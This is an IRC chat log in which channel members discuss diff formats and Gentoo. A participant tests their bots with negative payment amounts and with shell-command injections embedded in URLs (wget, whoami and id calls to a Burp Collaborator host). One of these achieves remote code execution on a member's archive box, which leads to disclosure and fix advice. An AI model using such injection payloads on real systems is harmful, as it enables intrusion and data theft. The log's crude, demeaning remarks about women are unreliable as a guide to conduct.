log
▁▁▁⏐
asciilifeform: ( transforms whole spittoon into 1 strand, and back, as necessary )
mircea_popescu: myeah. the only problem is that i suspect the unix notion of filenames (if ~properly~ regarded, ie, full paths) is actually entirely correct, and how gns will have to work anyway.
asciilifeform: it's correct but woefully incomplete, offers no compact way to represent movement.
mircea_popescu: gns:mircea/writings/trilema/categories/ is just about the only way to corectly refer to the item.
asciilifeform: and observe, would work entirely ok with given algo.
asciilifeform: it is not married to particular form of path.
mircea_popescu: asciilifeform the logged discussion on the topic was, "if hashes match but paths do not, the file was moved ; if hashes match and paths match, the file is untouched ; if hashes do not match but paths match the file was modified ; if hashes do not match and paths do not match the file was created/deleted"
mircea_popescu: this is complete.
asciilifeform: how would you represent the movement tho
asciilifeform: in the actual vpatch format
mircea_popescu: case 1 : the hash matches but the path does not.
asciilifeform: aa
mircea_popescu: file a/hurr/durr.txt hash aba1 matches file b/hurr/hurr.txt hash aba1, durr.txt was renamed as hurr.txt (renaming and moving are, like norton commander correctly identified, the SAME op. it's all a namechange.)
mircea_popescu: press f8.
asciilifeform: this scheme would however lock you into not ever both moving and modifying a given file, if you want the diff to be compact
asciilifeform: (*within 1 patch)
mircea_popescu: yes, the idea was to make a "reorg" patch separately if you're going to move files about.
mircea_popescu: which is proper, the moving should be costly.
phf: mircea_popescu: we're on the same page
mircea_popescu: meanwhile otherplaces, "shared libraries are obviously a good idea until you’ve actually used them. then whether it’s obvious or not that they’re a bad idea is mostly a matter of how close you are to trying to get them to work." such a great share that anant thing.
asciilifeform: mircea_popescu: your algo as far as i can tell worx perfectly well. mine however is simpler. ( and also worx )
mircea_popescu: asciilifeform yeah.
mircea_popescu: and so you check the dood's bio, and "I currently work at Ozlo, where we’re building an AI-powered digital assistant. Previously, I worked at Firebase, a scalable realtime application backend. Before that, I worked on a wide range of experimental projects to improve the web at Mozilla Labs."
asciilifeform: ( i would not even bother posting it, but it does cure inbandism, and afaik nobody else has proposed of a way to )
mircea_popescu: just... why the fuck! "i am an intelligent fellow. i have these dumbells on my feet ; and this loudspeaker screaming in my ears". dude...
mircea_popescu: asciilifeform seems to me a correctly designed and properly implemented version of trinque 's original doodle, which he summarily described as "bundle all files together and hash"
asciilifeform: aha.
trinque: mircea_popescu: bet you the dood even read it.
asciilifeform: hence i called 'trinquian vtron'
mircea_popescu: trinque hm ?
trinque: harrison bergeron I mean.
mircea_popescu: a. yes.
mircea_popescu: it's just... jesus christ i am at a loss to comprehend what the problems involved are. fuck me, i'm working on an ai sex bot to fetlife ? really ?
phf: asciilifeform: well you followed an established tmsr solution to inbandism, state the counts before you present the count.
mircea_popescu: it's not even the timewaste per se, it's the subjective relation to it.
asciilifeform: phf: afaik it's the only solution.
mircea_popescu: it is provably the only possible solution.
phf: btw unified diff also follows the same format. you can use @@ ... @@ to know exactly when your hunk ends (see the vpatch code)
mircea_popescu: aha.
asciilifeform: aha, asking for 'different solution' would be rather like asking for 'different pythagor's theorem'
phf: there's an implicit inbandism in unified diff though, which is the requirement for diff to be a POSIX "text file", so you still have arbitrary, and unknowably, large "lines"
mircea_popescu: i don't remember what you said when i asked if your new diff diffs binaries ?
asciilifeform: phf: this is curable by not using unix diff. the only lines ~produced~ by dir2txt ab initio are the decorative ones and the 1234 @ filepath . all other bytes are copies as-they-are and line-agnostically.
asciilifeform: *copied
phf: mircea_popescu: it doesn't now, there's no reason why it can't, diffing binaries is a different beast from text diffing, so it's about adding a new kind of hunk/header formats that say "this here follows a binary diff"
mircea_popescu: "ulrich drepper's famous page on". famous ? really ? how the FUCK is anything drepper did even vaguely worth the mention, let alone "famous" ? oh, because pantsuits push it, ie http://trilema.com/2012/a-conversation-with-frank-zappa-ix/#selection-231.0-233.634 ? hurr!
mircea_popescu: phf that's the issue in my head, of no practical consequence as it is : why, exactly, different beast, and how ?
asciilifeform: fwiw my format will actually eat bins without problem. ( you would still need a tool to 'human-display' them. and a differ other than unix diff. but the 'crystal' format holds arbitrary bytes, noprob )
mircea_popescu: if you have the time i'll hussle you with annoying fundamental questions. if not, later.
mircea_popescu: asciilifeform yeah.
phf: mircea_popescu: let's revisit this question in a couple of days, i'll give it some thought too. i want to finish regrind in the next day before hanbot is done with standing up her mp-wp instance
mircea_popescu: np
phf: it looks like i'm going to wrap up the rest of the "replicate diff/patch" this week, so that'll also be the time to start adding the clever features
mircea_popescu: it also looks like douchebag ran out of chicks in his discordbook, so we shall enjoy productivity unblemished lel
phf: tmsr tests your fuzzy numbers, it's where "plenty" becomes "~3-5" or more often than not "none at all"
mircea_popescu: hehe.
mircea_popescu: part and parcel of the problem of postmodernity, and the deep cause behind all the superficiality, is that nobody ever gets a run for his money. like in overadvanced (supercowardly) species, the whole contest of life consists of display and nothing more.
mircea_popescu: (as you might intuit, i was a terror as a 5yo being introduced to darwinism. "so why did the other birdy quit ?" "well the guy was bigger." "so ?" "so he's affraid of him." "why ?" "because he's bigger." "So what if he's bigger ? what could he do ? just flies around like an idiot" "could peck it" "so could the smaller one!" and on and on.)
douchebag: ill find more whores
douchebag: just busy with work last few days
douchebag: also let me try something
douchebag: !!pay -0.01 128BUcwkYM4AK2k6TXEg8RvA83kxL6Sw9Y
deedbot: Get your OTP: http://p.bvulpes.com/pastes/QHOjJ/?raw=true
douchebag: !!balance
deedbot: http://p.bvulpes.com/pastes/EqbW1/?raw=true
douchebag: !!v 387FBFD7CBFF96A786BA6603955FF979E301422D9E722AA258E45C174B949086
douchebag: !!pay -0.01 douchebag
deedbot: Get your OTP: http://p.bvulpes.com/pastes/9WVyn/?raw=true
douchebag: !!v 515B68D8A92E5C93C110EEA41B63B623FFCAC88F8F61DD243D5DE2E71C1A0AD2
douchebag: !!balance
deedbot: http://p.bvulpes.com/pastes/EuIId/?raw=true
douchebag: That's all the testing for that matter
douchebag: The idea was that if the bot subtracts the value I send Ie: Balance - - 0.01 it would actually become balance + 0.01 because maths
asciilifeform: the folx who Never Suspected minus sign exists -- live elsewhere
douchebag: And if the bot was checking if my balance is greater or equal to the value sent, it would obviously pass
douchebag: I actually have found that in web applications before
asciilifeform: this is why work with 'web applications before' is catastrophically terrible for yer health, douchebag . it is like building a wrestling career against kindergarteners.
douchebag: It's mostly entertainment
douchebag: It also leads me to wonder if there are any race conditions in deedbot
trinque: no, there are not.
trinque: and wtf, pay negative, you think I didn't handle that?
trinque: where's my report on trb dependencies?
douchebag: I'll get on that now, just got home from work
asciilifeform inevitably recalls the parable with the drunkard, who searched for the lost coin 'where the light is', rather than where he had dropped it
douchebag: What distro would you suggest doing a fresh install on?
trinque: gentoo'd be a fine choice
douchebag: That'd be interesting - I have minimal experience with gentoo
mircea_popescu: asciilifeform he has a point, javascript is fulla it.
mircea_popescu: also if you manage to upset the developer's expectation javascript uses ints, it'll fail all sorta 4.9999998 = 5 tests
trinque: this'd be why I didn't use the floopy lisp for the math (yes, could've done the checks in floopy lisp, but.)
mircea_popescu: myeah.
mircea_popescu: douchebag there's an almost-official gentoo version floating about, we're working towards making it definitive.
douchebag: interesting
trinque: https://trinque.org/2017/12/30/wip-cuntoo-installer/ << latest thing published on subj
trinque: but as dianan_coman observed, the outside world moved, while the thing hadn't yet eaten enough of the outside world.
trinque: idea is portage, the gentoo package build system, is redone in V
trinque: but, I would recommend a student go build his own by hand. doing so by reading my script would be fine, so long as you research every line to understand why that step was done.
mircea_popescu: !!pay 123456789012345678901234567890123456789012345678901234567890.123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
deedbot: Get your OTP: http://p.bvulpes.com/pastes/LfewT/?raw=true
douchebag: no integer overflow
mircea_popescu: deedbot the imperturbable.
trinque: loller
trinque: command is a dumb string until the OTP is confirmed, and then gets parsed and certain type demands are made of the result
trinque: which, if fail, straight into oblivion with it
douchebag1: !!subscribe http://test.com/$(`wget http://z110uzd1g39afotqos51hlm66xco0d.burpcollaborator.net/lolz.txt`)
deedbot: douchebag1 subscription to http://test.com/$(`wget failed
douchebag1: !!subscribe http://test.com/$(`wget${IFS}http://z110uzd1g39afotqos51hlm66xco0d.burpcollaborator.net/lolz.txt`)
deedbot: douchebag1 subscription to http://test.com/$(`wget${IFS}http://z110uzd1g39afotqos51hlm66xco0d.burpcollaborator.net/lolz.txt`) failed
ben_vulpes: dude you gotta do this shit in pm
douchebag1: kk
trinque: also subscribe lever has been removed for something like a year, and I've been processing subscription requests by hand
douchebag1: Ah
mircea_popescu: lmao
douchebag1: Did anyone click that
douchebag1: Because I got a hit
ben_vulpes: likely an archive bot
mircea_popescu: douchebag1 bot autoarchives
douchebag1: it doesn't look like wget though
mircea_popescu: in other lulz, "Hey! I'm Ashley. I'm an 18 year old girl living in Houston, TX who's in a bit of a financial bind at the moment. I'm a senior in high school. I don't even have my drivers license or a ride to work so it's not like I can get a normal job at the moment."
mircea_popescu: if anyone living in houston wants her profile.
trinque: lol nah I had one of those before, wrong jusrisdiction to straighten her out, as per the definitive trilema.
mircea_popescu: https://preview.ibb.co/eODLsH/000561fd_fca2_e814_01a7_4981143cd1f1_958.jpg the typical gingerly first timer anal-izer.
douchebag: trinque: For my writeup, do you want exploits that can actively be exploited on trb or just exploits in the dependencies used?
trinque: if yes, why, if not, why not, would be great.
douchebag: Sounds good
mircea_popescu: so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up.
lobbes: finally sat down and learned some basic sed commands. I especially love the ability to chose an alternate delimiter; makes certain cases of escaping characters a breeze!
lobbes currently hacking a script to convert all the absolute references in my downloaded kibo.com to relative
mircea_popescu: yep. %%% is better than ///
lobbes: turns out the whole kibo site is only 40 mb or so, so I figured I'd try and mirror the whole thing (after browsing it last night, I realized that the meta aspects of the site are part of the fun)
lobbes: plaintext dun do it justice
trinque suddenly regrets whatever space unescaping \/ is taking up in his skull.
mircea_popescu: lobbes here's a bonus : suppose you have a lengthy file (such as say a server log) and you want to extract just one column. you got awk : cat hurr.txt | awk '{print $3}' (and -F will set the delimiter if space's no good).
mircea_popescu: trinque i despise tools that make you escape. really, it's fucking dumb, let the metachar be settable so i can not need it.
mircea_popescu: and now consider something like cat *** | grep "data.maryland.gov" | awk '{print $19..$22}' | sort -u << "get me the fields 19th through 22nd, once only, and sorted alphabetically".
mircea_popescu: sed + awk are the excel of posix.
mircea_popescu: and as it has to be said : you are not a man until you've played a browser game through curl, pipe and awk/sed.
ben_vulpes: http://logs.bvulpes.com/trilema?d=2018-4-2#324071 << how did these numbers come out?☝︎
mimisbrunnr: Logged on 2018-04-02 16:54 mircea_popescu: we just discussed this ; s.nsa is at the most selling one of the two spares. ill run the numbers later an' give you an aye or nay.
mircea_popescu: still working on it.
ben_vulpes: kk
mircea_popescu: asciilifeform http://p.bvulpes.com/pastes/FQiv2/?raw=true
mircea_popescu: in other webamusements, https://www.themastermindwithin.com/thoughts/blog-traffic-and-income-report-march-2018/
mircea_popescu: "In March 2018, the blog had 7,556 page views and I made $27.09!!"
mircea_popescu: and in case anyone is missing the usagi era of bitcoin, it didn't end, it just moved on : http://behindmlm.com/companies/empower-network/david-wood-claims-he-can-heal-cancer-herpes-hiv-aids-diabetes/
ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26
deedbot: ben_vulpes updated rating of shinohai from 1 to -1 << ran off and took a rather useful tool with him
ben_vulpes: anyone want to buy some electronics off amazon for me, get reimbursed in btc?
deedbot: http://pizarroisp.net/index.php/2018/04/03/pizarro-statement-march-2018/ << PizzaroISP - Pizarro Statement, March 2018
shinohai: logs.bvulpes.com/trilema?d=2018-4-3#324450 <<< have used your script, and it's former incantaion from years ago - very useful things. My solution thus far is simply running a binhost locally, which is temporary as I try to tweak recipe for amd64.
mimisbrunnr: Logged on 2018-04-03 01:03 trinque: but, I would recommend a student go build his own by hand. doing so by reading my script would be fine, so long as you research every line to understand why that step was done.
shinohai: Also, trinque is your www of wot not updating at this time?
shinohai: Which brings me to:
shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits.☝︎
mimisbrunnr: Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26
shinohai: Have a great day #trilema!
shinohai: Nos veremos despues.
douchebag: hey guys
douchebag: I think I got remote code execution on someones box
douchebag: https://i.imgur.com/pPZlvQC.png
douchebag: the IP address begins with 174.108
douchebag: If that's one of you, please contact me and I will help you resolve this issue
mod6: mornin!
mod6: shinohai, if you could bring that thing that'd be nice.
mod6: meanwhile, we should probably replace that bot functionality asap. we need a way to get VWAP recorded in here daily.
lobbes: I think shinohai was going to try and send me tars of jhvh1 sometime >> http://btcbase.org/log/2018-03-24#1789503☝︎
a111: Logged on 2018-03-24 00:50 shinohai: I can tar the plugins up for you if you need 'em.
lobbes: either way, I'll try and slap up a vanilla gribble on my pizarro shell later this night
lobbes: how much fiat are we talkin'? If it is roughly under $500 I would be very interested >> http://btcbase.org/log/2018-04-03#1792246☝︎
a111: Logged on 2018-04-03 08:00 ben_vulpes: anyone want to buy some electronics off amazon for me, get reimbursed in btc?
lobbes bbl; off to the saltmines
ben_vulpes: grade a smarm
ben_vulpes: lobbes: mk i'll letcha know
douchebag: Hey, would you guys be able to show me up a pizarro shell for trb?
asciilifeform: mircea_popescu: http://btcbase.org/log/2018-04-03#1792240 >>> http://p.bvulpes.com/pastes/fIWW0/?raw=true☝︎
a111: Logged on 2018-04-03 04:27 mircea_popescu: asciilifeform http://p.bvulpes.com/pastes/FQiv2/?raw=true
asciilifeform: http://btcbase.org/log/2018-04-03#1792259 << neither mine nor anyone i know of☝︎
a111: Logged on 2018-04-03 12:39 douchebag: the IP address begins with 174.108
asciilifeform: http://btcbase.org/log/2018-04-03#1792258 << this pic is distinctly uninformative , i'd like to note☝︎
a111: Logged on 2018-04-03 12:39 douchebag: https://i.imgur.com/pPZlvQC.png
douchebag: asciilifeform: Basically last night I was sending commands in the bot that would lead to remote code execution
douchebag: The code execution being wget the url provided in case of blind RCE
asciilifeform: douchebag: ok, so carry on, put up a goatse on deedbot.org or whatever you normally do
douchebag: well it isn't deedbots IP
asciilifeform: tho the moar likely explanation is that trinque read the machine log, and, laughing, went to look at what was in yer intended payload url
asciilifeform: but i'll let him answer this one.
douchebag: Yeah I figured that was a possibility, I just figured I would mention that incase the code did get executed by anything unintentionally
asciilifeform: this is possibly foreign concept in 'web' world, but over here in the adult world people , for instance, read logs. every day.
asciilifeform: and uudecode payloads, deobfuscate js , whatever.
asciilifeform: ( and typically very disappointing, usually quite uninspiring, stale '1000-days' )
asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai☝︎
a111: Logged on 2018-04-03 12:30 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits.
mimisbrunnr: Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26
asciilifeform: douchebag: consider, 174.108. is a konsoomer cable isp in usa .
asciilifeform: ('time-warner' co. )
trinque: douchebag: that is not any of my IPs
trinque: what'd you do that got it to belch?
douchebag: no clue, I just checked the logs and saw that lolz.txt was grabbed via wget
trinque: auditor: "says here you talk like a fag, and your shit's all retarded"
shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge?☝︎
mimisbrunnr: Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai
trinque: douchebag: I'm asking what the test was, which involved lolz.txt
asciilifeform: shinohai: ben_vulpes made the reason for his neg quite unmysterious, imho
shinohai: but i like salt, my popcorn has been a bit bland of late.
shinohai: ben_vulpes is also aware *why* checking if bot is in #trilema these days is kinda low on list of priorities, as i am in field and only read logs.
shinohai: I don't see join/parts
douchebag: trinque: I was just issuing commands to the bot
douchebag: ie: !!send $(wget http://site.com/lolz.txt)
douchebag: And I saw the file actually was requested with wget from an IP address I did not recognize
trinque: yeah I followed that part the first time
douchebag: Okay so what's the question?
trinque: after which command did you get a boop
douchebag: I have no clue - I woke up this morning and saw it in the logs
douchebag: I tried a number of different requests
douchebag: i mean commands
trinque: gpg me the full IP?
shinohai: I mean, i still can't play eulora because minigame.bz/ hasn't a server, but i certainly didn't negrate the lot of the #pizarro folks.
trinque: shinohai: weren't you running a bot?
trinque: instead of whining about it, why not bring back said bot
shinohai: yup and it shall rejoin as soon as i get back @ desk. my apologies for inconvenience
shinohai: whining indeed.
trinque: yes, whining. indeed.
BingoBoingo: <mircea_popescu> so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. << Here "automercados" are
BingoBoingo: roughly convenience stores. The servicios tend to have better sandwiches
ben_vulpes: !!v A4C82702BD7A91BE63B8838DB2164C2B2BC39E9F99B411FB0EEDB8D2192D1F3F
deedbot: ben_vulpes unrated shinohai.
BingoBoingo: douchebag: When are some Qntra submissions incoming?
douchebag: I can have some ready tonight if you can link me to where qntra shares are traded
douchebag: last time I tried looking there were so broken links
ben_vulpes: http://logs.bvulpes.com/trilema?d=2018-4-3#324745 << you have it backwards; how i behave defines lordship and lo i got my way☝︎
mimisbrunnr: Logged on 2018-04-03 15:20 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge?
mimisbrunnr: Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai
BingoBoingo: douchebag: On MPEx, there's proxy issues being sorted out. Sometimes the proxies run away and MP has to chain them back to his Ex
BingoBoingo: In other news, the nose is mostly under control. South American cold still has my energy rather zapped. The Incan nurse however did apologize last night.
asciilifeform: hey BingoBoingo , possibly i already asked this a while back and then lost -- but plox to gpg me a postage addr where you can get mail. i want to try experiment.
ben_vulpes: hola mircea_popescu
BingoBoingo: asciilifeform: http://p.bvulpes.com/pastes/Yvat8/?raw=true
asciilifeform: danke BingoBoingo
BingoBoingo: asciilifeform: Remember, nothing of incredible value. I am still awaiting a birthday card from February.
mircea_popescu: heya!
BingoBoingo: Buenas Tardes
asciilifeform: and yes BingoBoingo i did think of the item you mentioned, and already prepared it, it ought to satisfy
asciilifeform: ohai mircea_popescu
trinque: douchebag: consider that if you figure out which box responded to you, you at the very least can improve some Lord's bot for him, maybe lobbes' archivebot slurped it? At best, (if it was done in PM), you've got something else listening in, slurping things up.
trinque: that latter would be a mighty interesting blog post
BingoBoingo: trinque: Remember the "Reddit Police" DDoS bot?
trinque: naw
BingoBoingo: That was 2014-ish
BingoBoingo: Roughly coincided with the GAW miners drama.
mircea_popescu: http://btcbase.org/log/2018-04-03#1792252 << lol wait, is he on the list of pizarro victims, with thewhet, minigame an' so on ? or what dramas am i missing here ?☝︎
a111: Logged on 2018-04-03 12:30 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits.
mimisbrunnr: Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26
mircea_popescu: BingoBoingo i remember a "bitcoin police" lol ?
mircea_popescu: (they, self-importantly, didn't want to give self up to #b-a, because of course http://trilema.com/and-in-todays-lulz-the-obnoxious-cocksucker )
BingoBoingo: mircea_popescu: Maybe that's what it was.
mircea_popescu: http://btcbase.org/log/2018-04-03#1792250 << iirc they were compiled once a day.☝︎
a111: Logged on 2018-04-03 12:29 shinohai: Also, trinque is your www of wot not updating at this time?
trinque: correct, cronulated
ben_vulpes: http://logs.bvulpes.com/trilema?d=2018-4-3#324705 << do you not have a machine capable of building trb?☝︎
mimisbrunnr: Logged on 2018-04-03 14:25 douchebag: Hey, would you guys be able to show me up a pizarro shell for trb?
douchebag: My machines are capable but if I'm going to be running a node, it would probably be best to have a dedicated VPS to do so
mircea_popescu: douchebag generally it runs on actual dedicated machines, rather than vps.
mircea_popescu: http://btcbase.org/log/2018-04-03#1792263 << it's all random numbers anyways.☝︎
a111: Logged on 2018-04-03 12:51 mod6: meanwhile, we should probably replace that bot functionality asap. we need a way to get VWAP recorded in here daily.
douchebag: Ahh okay
BingoBoingo: douchebag: The added value in running more nodes is generally spreading the network geographically, etc. There's little value in adding yet another nominal node to the same box or AWS freakshow
mircea_popescu: http://btcbase.org/log/2018-04-03#1792259 << did this ever come to anything then ?!☝︎
a111: Logged on 2018-04-03 12:39 douchebag: the IP address begins with 174.108
mircea_popescu: douchebag dood is building the UCI before we even have it lmao.
douchebag: UCI?
mircea_popescu: !#s UCI
a111: 189 results for "UCI", http://btcbase.org/log-search?q=UCI
mircea_popescu: "universal computing interface"
douchebag: ahh
trinque put a rather beefy node in the pizarro rack at 161.0.121.250
trinque: 376103 and counting
douchebag: Oh also
mircea_popescu: asciilifeform the pic shows that he got "something" to load a file from his filehost. supports the theory that has rce, if he can run wget he can run plenty.
douchebag: When I geoip'd that IP adddress
mircea_popescu: (consider, the way linux works today, if i can run wget as a user i can take the box, the memory leaks.)
asciilifeform: nobody seems to know who or what ran the wget
mircea_popescu: wget WILL time the netcard for you, the netcard has dma, that's the wholew story.
mircea_popescu: asciilifeform well, some ip apparently. i dunno, going through teh logs.
asciilifeform: asciilifeform's observation was that every idjit crapartist probing an asciilifeform-tended box , ever, without exception thought 'ooh, my wget ran' when asciilifeform reads log , and then , on specially-designated box, manually probes back & grabs payload
asciilifeform: ... but in this case, wasn't mine. and, interestingly, apparently not trinque either
mircea_popescu: this is a theory we can easily verify. douchebag write f2c26beed4 on the boxes' tits or something. can you get it reliably ?
mircea_popescu: not entirely intractable to discern whether human is involved or not.
asciilifeform: aha, supposing replicable
mircea_popescu: time will tell you everything.
douchebag: I need to get the boxes full IP
douchebag: sec
douchebag: Actually, I exited out of that - I'm able to retrieve it but I need to know the proper request to send. waiting on a response from that right now
deedbot: http://trilema.com/2018/dangerous/ << Trilema - Dangerous
mircea_popescu: the proper who ?
mircea_popescu: douchebag do you use screen, incidentally ?
douchebag: yes
mircea_popescu: a ok then.
douchebag: I did do a reverse search on that IP address though
douchebag: It seemed to be out of North Carolina if I remember correctly
lobbes is slowly assembling parts for his own home trb node. Waiting on replacement cpu fan to come in atm. Updates to follow!
douchebag: 174.108.31.15
douchebag: ^ Full IP
mircea_popescu has noticed over the years that the usage of screen is a sort of pons asinorum in computer usage. like the oil rag cloth in a car distinguishes pisi tourist from the driver who actually maintains the machinery ; or like condoms on the nightstand distinguish the woman from the girl and so on.
lobbes: Re: douchebag's recent wget payload: I can confirm that it most likely wasn't my archivebot. The bot doesn't download links directly, it stores list of urls found in chan and forwards them to the archive.is submit form
mircea_popescu: http://btcbase.org/log/2018-04-03#1792286 << i very well fucking don't. jesus christ, 1mn+ lines/day, god help me. i catgrep the item now and again, but the odds of me noticing something in there are pretty slim.☝︎
a111: Logged on 2018-04-03 15:07 asciilifeform: this is possibly foreign concept in 'web' world, but over here in the adult world people , for instance, read logs. every day.
asciilifeform: y'know it's still 'read' if you put it through meatgrinder
mircea_popescu: but very distantly read. it's a perl meatgrinder, i'm sure it misses most of the meat.
mircea_popescu: douchebag looks like a home ip. \
mircea_popescu: vulnerable home computers are pestilentially common ; did you get to the portion in the logs where we logged into a shitton of servers administering solar panels ?
mircea_popescu: http://btcbase.org/log/2018-04-03#1792296 << oh don't be silly. i now concur with alf, this is no indication of anything yet. get it to do it systematically, in reaction to something you control, THEN you have maybe something.☝︎
a111: Logged on 2018-04-03 15:24 douchebag: no clue, I just checked the logs and saw that lolz.txt was grabbed via wget
mircea_popescu: http://btcbase.org/log/2018-04-03#1792298 << what do these two have to do with each other anyway. there should be a difference between doing wrong and not doing enough. not every burgher can be in the town council, that dun mean he's bankrupt now or something, what the hell.☝︎
a111: Logged on 2018-04-03 15:29 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge?
mimisbrunnr: Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai
douchebag: It it okay if I test this payload again right now
douchebag: To see if I get another pingback
mircea_popescu: i don't see why not.
BingoBoingo: Best case it's just the FBI and they are too busy chasing imaginary Russians to notice you walking away with their server
douchebag: Alright, give me a moment I just didn't want to bother anyone with my payloads
lobbes: douchebag aha I think that is my home ip. Plox do test payload again
douchebag: Oh shit, and you never manually ran wget on that IP
douchebag: ????
douchebag: or on the link???
lobbes: Actually, when was this? I think I may hace manually wgot
lobbes: *have
douchebag: last night
douchebag: vjiayxgdlqk1veovjxso63g6ixopce.burpcollaborator.net
douchebag: on something that looked like that
lobbes: Hmm interesting. Yeah this was a few weeks ago iirc when I curiously grabbed one of yer payloads via wget
douchebag: yeah no dude
douchebag: If you didn't do this last night
douchebag: I got remote code execution on your box
douchebag: Can you send me links to the scripts ?
douchebag: I'll show you how to fix it
lobbes: Also not 100% positive if that was my home ip, but charlotte nc is my residence. I'll confirm that tonight
douchebag: So lobbes
douchebag: Are any of these things being manually passed into bash commands
douchebag: here lets see something
douchebag: http://6w3lb8toy1xc8p16w85zjethv814pt.burpcollaborator.net/`whoami`
douchebag: lobbes: How often does the bot search ?
douchebag: http://3nri25klpyo9zms3n5wwabkem5s2gr.burpcollaborator.net/$(whoami)
lobbes: the bot operates from an external vps (not my home ip). Shoves urls into a db which my home box downloads and then passes eaxh one to archive.is.
douchebag: and how are you passing these to archive.is
lobbes: That is done through a process where a python script reads from (ahhh now I think I see where it may remotely execute) db and passes url via bash to a phantomjs script which submits to archive.is
douchebag: Hahaha
douchebag: Awesome
douchebag: Well for me at least
douchebag: For you, I really do suggest fixing that
lobbes: I'll dig more into it tonight once I'm in front of it all
douchebag: Because if I was a blackhat I could have pwned ur home box
lobbes: Yeah really. Thank you for uncovering this (I am n00b, you will soon learn)
douchebag: No problem man, just glad I could help!
lobbes: Likewise, I'll give ya a favorable rating once in front of my gpg key
douchebag: Sounds like a plan
trinque: wd douchebag
douchebag: thx <3
mircea_popescu: lobbes fwiw this is very poor design.
lobbes: Oya. Hey, this is the peril of "learning as you go"
lobbes: What would you suggest as a better design? Obvs no passing urls via bash
mircea_popescu: why is your home box doing work that's not directed at you ?
mircea_popescu: conceptually, if it's talking to you it's an infangwif ; if it's talking to the outside it's an outsidewif. why are you fucking streetwalkers / sending the wife to walk the streets ?
mircea_popescu: when you say "home box", what do you even mean ?
douchebag: lobbes: If you want to make a secure application, consider all user input as malicious
douchebag: lobbes
douchebag: Your home machines name is lobbes
douchebag: correct?
lobbes: mircea_popescu: the logs, but it is an old craptop with an ssd dedicated to public toilet Only place I had to store the gbs of archive data.
lobbes: douchebag si
douchebag: Yep
douchebag: https://i.imgur.com/Wwrp9VP.png
douchebag: RCE confirmed
mircea_popescu: lobbes well fine, but i was discussing teh design as such. there's no rule against "i have a crappy box for a server that's not worth placing in a dc so it sits in garage", sure. nor is there any rule against "i just simplified speech, called it homebox, it's not" -- but what you say is all i have to go on, that's all.
mircea_popescu: douchebag umm, you used his ~browser~ to do this ?!
douchebag: I think it's being passed into bash into a PhantomJS interpreter
lobbes: ^^
mircea_popescu: oh.
mircea_popescu: nifty.
lobbes: Man I feel stupid in general
mircea_popescu: !!rated douchebag
deedbot: mircea_popescu rated douchebag 1 at 2018/01/15 07:34:46 << hyde.solutions
mircea_popescu: !!rate douchebag 2 "your home machine's name is lobbes"
deedbot: Get your OTP: http://p.bvulpes.com/pastes/Nn9Ye/?raw=true
douchebag: lobbes: Just make sure whenever you handle any user input, consider all input as potentially malicious
mircea_popescu: ben_vulpes i wasn't initially going to say anything besides "nay" ; but hey, pizarro's a friend of ours, so : nsa would sell the spare machine for cost, which is about .371. comes with two fgs installed and free shipping.
douchebag: and for fucks sake do not pass any user input into a bash interpreter
lobbes: douchebag really though, this has been a wake up call to get my shit together. Ty again
douchebag: Yeah no problem, it was pretty fun to discover
mircea_popescu: !!v 86FC0A4A826976505E6815A4D3677651F10E73948ED9B253C022B65F6C2DFB4E
deedbot: mircea_popescu updated rating of douchebag from 1 to 2 << "your home machine's name is lobbes"
lobbes: Just know, I'm prolly the easiest target here :P
mircea_popescu: i'm not so certain.
douchebag: http://f0gufhxx2a1lcy5f0h98nnxqzh5ht6.burpcollaborator.net/`id`
mircea_popescu: https://portswigger.net/burp/help/collaborator << that burp thing's not even retarded. runs a dummy server on the side, ns, everything.
mircea_popescu: douchebag do you know who made it ?
douchebag: It's made by a team of people
douchebag: It was originally developed by dafydd portswigger
mircea_popescu: right.
douchebag: now he has a couple other people working on it, I know ones name is James Kettle
mircea_popescu: did you spring for teh $350 a year thing ?
douchebag: Yeah, well worth it
mircea_popescu: i believe.
douchebag: mircea_popescu: I got 0.01 for perma voice, do I get 0.02 for Remote Command Execution :-D ?
mircea_popescu: lol. i was going to buy you the pro yearly package, actually. but since you already have it, no need :D
